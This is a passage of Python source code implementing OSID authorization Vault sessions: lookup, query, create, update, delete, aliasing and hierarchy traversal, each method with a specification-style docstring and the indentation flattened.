list
raise: NullArgument - ``vault_genus_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_record_type(self, vault_record_type):
"""Gets a ``VaultList`` containing the given vault record ``Type``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: vault_record_type (osid.type.Type): a vault record type
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``vault_record_type`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def get_vaults_by_provider(self, resource_id):
"""Gets a ``VaultList`` from the given provider ````.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
arg: resource_id (osid.id.Id): a resource ``Id``
return: (osid.authorization.VaultList) - the returned ``Vault``
list
raise: NullArgument - ``resource_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
def get_vaults(self):
"""Gets all ``Vaults``.
In plenary mode, the returned list contains all known vaults or
an error results. Otherwise, the returned list may contain only
those vaults that are accessible through this session.
return: (osid.authorization.VaultList) - a ``VaultList``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.get_bins_template
# NOTE: This implementation currently ignores plenary view
if self._catalog_session is not None:
return self._catalog_session.get_catalogs()
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find().sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
vaults = property(fget=get_vaults)
class VaultQuerySession(abc_authorization_sessions.VaultQuerySession, osid_sessions.OsidSession):
"""This session provides methods for searching among ``Vault`` objects.
The search query is constructed using the ``VaultQuery``.
Vaults may have a query record indicated by their respective record
types. The query record is accessed via the ``VaultQuery``.
"""
_session_namespace = 'authorization.VaultQuerySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_query_session()
self._forms = dict()
self._kwargs = kwargs
def can_search_vaults(self):
"""Tests if this user can perform ``Vault`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
return: (boolean) - ``false`` if search methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.can_search_bins_template
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
def get_vault_query(self):
"""Gets a vault query.
return: (osid.authorization.VaultQuery) - a vault query
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bin_query_template
return queries.VaultQuery(runtime=self._runtime)
vault_query = property(fget=get_vault_query)
@utilities.arguments_not_none
def get_vaults_by_query(self, vault_query):
"""Gets a list of ``Vault`` objects matching the given search.
arg: vault_query (osid.authorization.VaultQuery): the vault
query
return: (osid.authorization.VaultList) - the returned
``VaultList``
raise: NullArgument - ``vault_query`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinQuerySession.get_bins_by_query_template
if self._catalog_session is not None:
return self._catalog_session.get_catalogs_by_query(vault_query)
query_terms = dict(vault_query._query_terms)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
result = collection.find(query_terms).sort('_id', DESCENDING)
return objects.VaultList(result, runtime=self._runtime, proxy=self._proxy)
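# Query sketch (illustrative; ``match_type`` is a placeholder string-match
# ``Type`` and the matcher signature is assumed from OsidObjectQuery):
#     query = query_session.get_vault_query()
#     query.match_display_name('Test Vault', match_type, True)
#     vaults = query_session.get_vaults_by_query(query)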
class VaultAdminSession(abc_authorization_sessions.VaultAdminSession, osid_sessions.OsidSession):
"""This session creates, updates, and deletes ``Vaults``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create a
``Vault,`` a ``VaultForm`` is requested using
``get_vault_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``VaultForm`` will indicate that it is to be used with a create
operation and can be used to examine metadata or validate data prior
to creation. Once the ``VaultForm`` is submitted to a create
operation, it cannot be reused with another create operation unless
the first operation was unsuccessful. Each ``VaultForm`` corresponds
to an attempted transaction.
For updates, ``VaultForms`` are requested for the ``Vault`` ``Id``
that is to be updated using ``getVaultFormForUpdate()``. Similarly,
the ``VaultForm`` has metadata about the data that can be updated
and it can perform validation before submitting the update. The
``VaultForm`` can only be used once for a successful update and
cannot be reused.
The delete operations delete ``Vaults``. It is safer to remove all
mappings to the ``Vault`` catalogs before deletion.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
_session_namespace = 'authorization.VaultAdminSession'
def __init__(self, proxy=None, runtime=None, **kwargs):
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_admin_session()
self._forms = dict()
self._kwargs = kwargs
def can_create_vaults(self):
"""Tests if this user can create ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer create
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` creation is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalogs()
return True
@utilities.arguments_not_none
def can_create_vault_with_record_types(self, vault_record_types):
"""Tests if this user can create a single ``Vault`` using the desired record types.
While ``AuthorizationManager.getVaultRecordTypes()`` can be used
to examine which records are supported, this method tests which
record(s) are required for creating a specific ``Vault``.
Providing an empty array tests if a ``Vault`` can be created
with no records.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (boolean) - ``true`` if ``Vault`` creation using the
specified ``Types`` is supported, ``false`` otherwise
raise: NullArgument - ``vault_record_types`` is ``null``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_create_bin_with_record_types
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_create_catalog_with_record_types(catalog_record_types=vault_record_types)
return True
@utilities.arguments_not_none
def get_vault_form_for_create(self, vault_record_types):
"""Gets the vault form for creating new vaults.
A new form should be requested for each create transaction.
arg: vault_record_types (osid.type.Type[]): array of vault
record types
return: (osid.authorization.VaultForm) - the vault form
raise: NullArgument - ``vault_record_types`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - unable to get form with requested record
types
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_create_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_create(catalog_record_types=vault_record_types)
for arg in vault_record_types:
if not isinstance(arg, ABCType):
raise errors.InvalidArgument('one or more argument array elements is not a valid OSID Type')
if vault_record_types == []:
result = objects.VaultForm(
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
else:
result = objects.VaultForm(
record_types=vault_record_types,
runtime=self._runtime,
effective_agent_id=self.get_effective_agent_id(),
proxy=self._proxy) # Probably don't need effective agent id now that we have proxy in form.
self._forms[result.get_id().get_identifier()] = not CREATED
return result
@utilities.arguments_not_none
def create_vault(self, vault_form):
"""Creates a new ``Vault``.
arg: vault_form (osid.authorization.VaultForm): the form for
this ``Vault``
return: (osid.authorization.Vault) - the new ``Vault``
raise: IllegalState - ``vault_form`` already used in a create
transaction
raise: InvalidArgument - one or more of the form elements is
invalid
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_create()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.create_bin_template
if self._catalog_session is not None:
return self._catalog_session.create_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not a VaultForm')
if vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for update only, not create')
try:
if self._forms[vault_form.get_id().get_identifier()] == CREATED:
raise errors.IllegalState('vault_form already used in a create transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
insert_result = collection.insert_one(vault_form._my_map)
self._forms[vault_form.get_id().get_identifier()] = CREATED
result = objects.Vault(
osid_object_map=collection.find_one({'_id': insert_result.inserted_id}),
runtime=self._runtime,
proxy=self._proxy)
return result
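# Creation sketch (illustrative; attribute-style setters on the form are
# assumed from the OsidForm conventions):
#     form = admin_session.get_vault_form_for_create([])
#     form.display_name = 'My Vault'
#     form.description = 'An example vault'
#     vault = admin_session.create_vault(form)
# As with authorizations, the form is single-use and is marked CREATED in
# self._forms, so reusing it raises IllegalState.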
def can_update_vaults(self):
"""Tests if this user can update ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known updating a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer update
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` modification is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_update_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_update_catalogs()
return True
@utilities.arguments_not_none
def get_vault_form_for_update(self, vault_id):
"""Gets the vault form for updating an existing vault.
A new vault form should be requested for each update
transaction.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault``
return: (osid.authorization.VaultForm) - the vault form
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.get_bin_form_for_update_template
if self._catalog_session is not None:
return self._catalog_session.get_catalog_form_for_update(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
result = collection.find_one({'_id': ObjectId(vault_id.get_identifier())})
cat_form = objects.VaultForm(osid_object_map=result, runtime=self._runtime, proxy=self._proxy)
self._forms[cat_form.get_id().get_identifier()] = not UPDATED
return cat_form
@utilities.arguments_not_none
def update_vault(self, vault_form):
"""Updates an existing vault.
arg: vault_form (osid.authorization.VaultForm): the form
containing the elements to be updated
raise: IllegalState - ``vault_form`` already used in an update
transaction
raise: InvalidArgument - the form contains an invalid value
raise: NullArgument - ``vault_form`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
raise: Unsupported - ``vault_form`` did not originate from
``get_vault_form_for_update()``
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.update_bin_template
if self._catalog_session is not None:
return self._catalog_session.update_catalog(catalog_form=vault_form)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_form, ABCVaultForm):
raise errors.InvalidArgument('argument type is not a VaultForm')
if not vault_form.is_for_update():
raise errors.InvalidArgument('the VaultForm is for create only, not update')
try:
if self._forms[vault_form.get_id().get_identifier()] == UPDATED:
raise errors.IllegalState('vault_form already used in an update transaction')
except KeyError:
raise errors.Unsupported('vault_form did not originate from this session')
if not vault_form.is_valid():
raise errors.InvalidArgument('one or more of the form elements is invalid')
collection.save(vault_form._my_map) # save is deprecated - change to replace_one
self._forms[vault_form.get_id().get_identifier()] = UPDATED
# Note: this is out of spec. The OSIDs don't require an object to be returned
return objects.Vault(osid_object_map=vault_form._my_map, runtime=self._runtime, proxy=self._proxy)
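    # Illustrative usage sketch with hypothetical names (`admin_session`,
    # `vault`): forms are single-use, so request a fresh one per update.
    #
    #     form = admin_session.get_vault_form_for_update(vault.get_id())
    #     form.display_name = 'Renamed Vault'   # assumed form attribute
    #     admin_session.update_vault(form)
    #     admin_session.update_vault(form)      # raises IllegalState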
def can_delete_vaults(self):
"""Tests if this user can delete vaults.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known deleting a ``Vault``
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may not wish to offer delete
operations to unauthorized users.
return: (boolean) - ``false`` if ``Vault`` deletion is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.can_delete_bins
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_delete_catalogs()
return True
@utilities.arguments_not_none
def delete_vault(self, vault_id):
"""Deletes a ``Vault``.
arg: vault_id (osid.id.Id): the ``Id`` of the ``Vault`` to
remove
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinAdminSession.delete_bin_template
if self._catalog_session is not None:
return self._catalog_session.delete_catalog(catalog_id=vault_id)
collection = JSONClientValidated('authorization',
collection='Vault',
runtime=self._runtime)
if not isinstance(vault_id, ABCId):
raise errors.InvalidArgument('the argument is not a valid OSID Id')
for object_catalog in ['Authorization', 'Function', 'Qualifier', 'Vault']:
obj_collection = JSONClientValidated('authorization',
collection=object_catalog,
runtime=self._runtime)
if obj_collection.find({'assignedVaultIds': {'$in': [str(vault_id)]}}).count() != 0:
raise errors.IllegalState('catalog is not empty')
collection.delete_one({'_id': ObjectId(vault_id.get_identifier())})
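    # Note on the emptiness check above (a reading of this template, not
    # spec text): a Vault with Authorizations, Functions, Qualifiers, or
    # child Vaults still assigned to it cannot be deleted; delete_vault()
    # raises IllegalState until those are removed or reassigned.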
def can_manage_vault_aliases(self):
"""Tests if this user can manage ``Id`` aliases for ``Vaults``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known changing an alias
will result in a ``PermissionDenied``. This is intended as a
hint to an application that may opt not to offer alias
operations to an unauthorized user.
return: (boolean) - ``false`` if ``Vault`` aliasing is not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
return True
@utilities.arguments_not_none
def alias_vault(self, vault_id, alias_id):
"""Adds an ``Id`` to a ``Vault`` for the purpose of creating compatibility.
The primary ``Id`` of the ``Vault`` is determined by the
provider. The new ``Id`` performs as an alias to the primary
``Id``. If the alias is a pointer to another vault it is
reassigned to the given vault ``Id``.
arg: vault_id (osid.id.Id): the ``Id`` of a ``Vault``
arg: alias_id (osid.id.Id): the alias ``Id``
raise: AlreadyExists - ``alias_id`` is already assigned
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``alias_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.alias_bin_template
if self._catalog_session is not None:
return self._catalog_session.alias_catalog(catalog_id=vault_id, alias_id=alias_id)
self._alias_id(primary_id=vault_id, equivalent_id=alias_id)
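    # Illustrative aliasing sketch with hypothetical Ids: after
    #
    #     admin_session.alias_vault(vault_id, legacy_id)
    #
    # lookups by `legacy_id` resolve to the vault identified by `vault_id`;
    # an alias already pointing at another vault is reassigned rather than
    # rejected.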
class VaultHierarchySession(abc_authorization_sessions.VaultHierarchySession, osid_sessions.OsidSession):
"""This session defines methods for traversing a hierarchy of ``Vault`` objects.
Each node in the hierarchy is a unique ``Vault``. The hierarchy may
be traversed recursively to establish the tree structure through
    ``get_parent_vaults()`` and ``get_child_vaults()``. To relate these
``Ids`` to another OSID, ``get_vault_nodes()`` can be used for
retrievals that can be used for bulk lookups in other OSIDs. Any
``Vault`` available in the Authorization OSID is known to this
hierarchy but does not appear in the hierarchy traversal until added
as a root node or a child of another node.
A user may not be authorized to traverse the entire hierarchy. Parts
of the hierarchy may be made invisible through omission from the
returns of ``get_parent_vaults()`` or ``get_child_vaults()`` in lieu
of a ``PermissionDenied`` error that may disrupt the traversal
through authorized pathways.
This session defines views that offer differing behaviors when
retrieving multiple objects.
* comparative view: vault elements may be silently omitted or re-
ordered
* plenary view: provides a complete set or is an error condition
"""
_session_namespace = 'authorization.VaultHierarchySession'
def __init__(self, proxy=None, runtime=None, **kwargs):
# Implemented from template for
# osid.resource.BinHierarchySession.init_template
OsidSession.__init__(self)
OsidSession._init_catalog(self, proxy, runtime)
self._forms = dict()
self._kwargs = kwargs
if self._cataloging_manager is not None:
self._catalog_session = self._cataloging_manager.get_catalog_hierarchy_session()
else:
hierarchy_mgr = self._get_provider_manager('HIERARCHY')
self._hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
Id(authority='AUTHORIZATION',
namespace='CATALOG',
identifier='VAULT'),
proxy=self._proxy)
def get_vault_hierarchy_id(self):
"""Gets the hierarchy ``Id`` associated with this session.
return: (osid.id.Id) - the hierarchy ``Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy_id
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy_id()
return self._hierarchy_session.get_hierarchy_id()
vault_hierarchy_id = property(fget=get_vault_hierarchy_id)
def get_vault_hierarchy(self):
"""Gets the hierarchy associated with this session.
return: (osid.hierarchy.Hierarchy) - the hierarchy associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_hierarchy
if self._catalog_session is not None:
return self._catalog_session.get_catalog_hierarchy()
return self._hierarchy_session.get_hierarchy()
vault_hierarchy = property(fget=get_vault_hierarchy)
def can_access_vault_hierarchy(self):
"""Tests if this user can perform hierarchy queries.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations.
return: (boolean) - ``false`` if hierarchy traversal methods are
not authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.can_access_bin_hierarchy
# NOTE: It is expected that real authentication hints will be
# handled in a service adapter above the pay grade of this impl.
if self._catalog_session is not None:
return self._catalog_session.can_access_catalog_hierarchy()
return True
def use_comparative_vault_view(self):
"""The returns from the vault methods may omit or translate elements based on this session, such as authorization, and not result in an error.
This view is used when greater interoperability is desired at
the expense of precision.
*compliance: mandatory -- This method is must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_comparative_bin_view
self._catalog_view = COMPARATIVE
if self._catalog_session is not None:
self._catalog_session.use_comparative_catalog_view()
def use_plenary_vault_view(self):
"""A complete view of the ``Hierarchy`` returns is desired.
Methods will return what is requested or result in an error.
This view is used when greater precision is desired at the
expense of interoperability.
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinLookupSession.use_plenary_bin_view
self._catalog_view = PLENARY
if self._catalog_session is not None:
self._catalog_session.use_plenary_catalog_view()
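    # Illustrative view-switching sketch: these calls toggle how the
    # multi-object returns of this session behave.
    #
    #     hierarchy_session.use_plenary_vault_view()      # all-or-error
    #     hierarchy_session.use_comparative_vault_view()  # best-effort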
def get_root_vault_ids(self):
"""Gets the root vault ``Ids`` in this hierarchy.
return: (osid.id.IdList) - the root vault ``Ids``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_root_catalog_ids()
return self._hierarchy_session.get_roots()
root_vault_ids = property(fget=get_root_vault_ids)
def get_root_vaults(self):
"""Gets the root vaults in this vault hierarchy.
return: (osid.authorization.VaultList) - the root vaults
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
        *compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_root_bins
if self._catalog_session is not None:
return self._catalog_session.get_root_catalogs()
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(list(self.get_root_vault_ids()))
root_vaults = property(fget=get_root_vaults)
@utilities.arguments_not_none
def has_parent_vaults(self, vault_id):
"""Tests if the ``Vault`` has any parents.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (boolean) - ``true`` if the vault has parents, ``false``
otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_parent_bins
if self._catalog_session is not None:
return self._catalog_session.has_parent_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_parents(id_=vault_id)
@utilities.arguments_not_none
def is_parent_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a direct parent of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is a parent of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``id`` or ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_parent_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_parent_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_parent(id_=vault_id, parent_id=id_)
@utilities.arguments_not_none
def get_parent_vault_ids(self, vault_id):
"""Gets the parent ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.id.IdList) - the parent ``Ids`` of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_parents(id_=vault_id)
@utilities.arguments_not_none
def get_parent_vaults(self, vault_id):
"""Gets the parents of the given vault.
arg: vault_id (osid.id.Id): a vault ``Id``
return: (osid.authorization.VaultList) - the parents of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_parent_bins
if self._catalog_session is not None:
return self._catalog_session.get_parent_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_parent_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_ancestor_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is an ancestor of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if this ``id`` is an ancestor of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_ancestor_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_ancestor_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_ancestor(id_=id_, ancestor_id=vault_id)
@utilities.arguments_not_none
def has_child_vaults(self, vault_id):
"""Tests if a vault has any children.
arg: vault_id (osid.id.Id): a ``vault_id``
return: (boolean) - ``true`` if the ``vault_id`` has children,
``false`` otherwise
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.has_child_bins
if self._catalog_session is not None:
return self._catalog_session.has_child_catalogs(catalog_id=vault_id)
return self._hierarchy_session.has_children(id_=vault_id)
@utilities.arguments_not_none
def is_child_of_vault(self, id_, vault_id):
"""Tests if a vault is a direct child of another.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a child of
``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_child_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_child_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_child(id_=vault_id, child_id=id_)
@utilities.arguments_not_none
def get_child_vault_ids(self, vault_id):
"""Gets the child ``Ids`` of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.id.IdList) - the children of the vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bin_ids
if self._catalog_session is not None:
return self._catalog_session.get_child_catalog_ids(catalog_id=vault_id)
return self._hierarchy_session.get_children(id_=vault_id)
@utilities.arguments_not_none
def get_child_vaults(self, vault_id):
"""Gets the children of the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
return: (osid.authorization.VaultList) - the children of the
vault
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_child_bins
if self._catalog_session is not None:
return self._catalog_session.get_child_catalogs(catalog_id=vault_id)
return VaultLookupSession(
self._proxy,
self._runtime).get_vaults_by_ids(
list(self.get_child_vault_ids(vault_id)))
@utilities.arguments_not_none
def is_descendant_of_vault(self, id_, vault_id):
"""Tests if an ``Id`` is a descendant of a vault.
arg: id (osid.id.Id): an ``Id``
arg: vault_id (osid.id.Id): the ``Id`` of a vault
return: (boolean) - ``true`` if the ``id`` is a descendant of
the ``vault_id,`` ``false`` otherwise
raise: NotFound - ``vault_id`` not found
raise: NullArgument - ``vault_id`` or ``id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: If ``id`` is not found return ``false``.
"""
# Implemented from template for
# osid.resource.BinHierarchySession.is_descendant_of_bin
if self._catalog_session is not None:
return self._catalog_session.is_descendant_of_catalog(id_=id_, catalog_id=vault_id)
return self._hierarchy_session.is_descendant(id_=id_, descendant_id=vault_id)
@utilities.arguments_not_none
def get_vault_node_ids(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
arg: ancestor_levels (cardinal): the maximum number of
ancestor levels to include. A value of 0 returns no
parents in the node.
arg: descendant_levels (cardinal): the maximum number of
descendant levels to include. A value of 0 returns no
children in the node.
arg: include_siblings (boolean): ``true`` to include the
siblings of the given node, ``false`` to omit the
siblings
return: (osid.hierarchy.Node) - a vault node
raise: NotFound - ``vault_id`` is not found
raise: NullArgument - ``vault_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for
# osid.resource.BinHierarchySession.get_bin_node_ids
if self._catalog_session is not None:
return self._catalog_session.get_catalog_node_ids(
catalog_id=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
return self._hierarchy_session.get_nodes(
id_=vault_id,
ancestor_levels=ancestor_levels,
descendant_levels=descendant_levels,
include_siblings=include_siblings)
@utilities.arguments_not_none
def get_vault_nodes(self, vault_id, ancestor_levels, descendant_levels, include_siblings):
"""Gets a portion of the hierarchy for the given vault.
arg: vault_id (osid.id.Id): the ``Id`` to query
